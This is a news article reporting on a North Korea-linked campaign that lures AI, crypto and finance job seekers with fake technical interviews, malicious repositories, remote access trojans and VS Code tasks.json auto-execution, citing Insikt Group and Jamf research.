North Korean Hackers Target 3,100+ IPs in Sophisticated AI, Crypto, and Finance Job Scam

State-sponsored cyber operatives are weaponizing career opportunities to infiltrate the world's most innovative sectors.

Forget phishing emails—the latest attack vector masquerades as dream jobs in artificial intelligence, blockchain development, and quantitative finance. A North Korean-linked advanced persistent threat group has launched a coordinated campaign, compromising over 3,100 unique IP addresses by dangling lucrative positions in front of high-skilled professionals.

The Anatomy of a Modern Digital Heist

The operation doesn't just steal resumes—it steals network access. Candidates, eager to join the cutting edge, download what appears to be legitimate technical interview materials or coding challenges. These files deploy sophisticated malware, creating backdoors into corporate systems. The targets aren't random; they're the engineers and analysts building the next generation of financial and technological infrastructure.

Why Crypto and Fintech Are Prime Targets

The digital asset and fintech space represents a perfect storm: high-value transactions, rapidly evolving security postures, and a global talent hunt. Hackers bypass traditional perimeter defenses by exploiting human ambition. Once inside, they don't just siphon data—they can manipulate transactions, compromise smart contracts, or lay dormant until a major fund movement creates a payday. It's a grim reminder that in the race for innovation, security often plays catch-up.

A cynical take? Wall Street's old guard might call it karma—the decentralized, borderless future getting a brutal lesson in real-world geopolitics. The ultimate provocation: the very tools promising financial sovereignty are being undermined by a regime funding its ambitions through digital theft. The industry's growth now demands an equal investment in cyber vigilance—because the most valuable token in crypto isn't on the blockchain; it's your network access.

North Korea launches fake recruitment interviews malware campaign 

As explained by Insikt Group, the “Contagious Interview” campaign features bad actors who pose as recruiters or developers and approach job seekers with technical interview exercises. At least 3,136 individual IP addresses were targeted during the monitoring period, the security analysts said.

The attackers presented themselves as crypto and technology firm representatives, requesting that candidates review code, clone repositories, or complete coding tasks. 

“In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target,” the threat intelligence firm wrote in its report.

The operation has several aliases in both private and open-source insights on North Korea hackers, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, and WaterPlum. 

The cybersecurity group also mentioned that the hackers used Astrill VPN and IP ranges to administer China-based command-and-control servers. Meanwhile, 17 service providers hosted malware like BeaverTail and GolangGhost servers for them.

Luring victims with personas, GitHub, and Ukrainian cover stories

Insikt Group spotted four online personas linked to PurpleBravo, following an investigation into malicious GitHub repositories, social media chatter on crypto scams, and a hacking network intelligence service.

According to the report, these profiles consistently presented themselves as being based in Odessa, Ukraine, while targeting job seekers from South Asia. Insikt said it was unable to determine why Ukrainian identities were used in the ruse. 

In one of the fake programs, hackers used a website advertising a token based on a food brand. However, researchers could not establish a verified connection between the coin and the company it referenced. Scammers, automated bots, and malicious links populate the project’s official Telegram channel. 

Moreover, the operation also featured two related remote access trojans, PylangGhost and GolangGhost. The malware families are multi-platform tools that share identical commands and automate the theft of browser credentials and cookies.

GolangGhost is compatible with several operating systems, but PylangGhost only works on Windows systems and can bypass Chrome’s app-bound credential protection for version 127 and later.

Insikt Group found Telegram channels advertising LinkedIn and Upwork accounts for sale, with the sellers using proxy services like proxy-seller[.]com, powervps[.]net, residentialvps[.]com, lunaproxy[.]com, and sms-activate[.]io, and virtual private servers to hide their locations. The operator was also seen interacting with the cryptocurrency trading platform MEXC Exchange.

VS Code backdoors on Microsoft Visual Studio

On Monday, Jamf Threat Labs reported that North Korea-linked actors have developed a weaponized version of Microsoft Visual Studio Code that can find backdoors in systems. The tactic was first identified in December 2025 and has since been refined, the security analysts said.

According to Jamf security researcher Thijs Xhaflaire, the attackers can implant malware that grants remote code execution on machines. The infection chain begins when a target clones a malicious Git repository and opens it in VS Code.

“When the project is opened, Visual Studio Code prompts the user to trust the repository author. If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system,” Thijs Xhaflaire wrote.

Sharpen your strategy with mentorship + daily ideas - 30 days free access to our trading program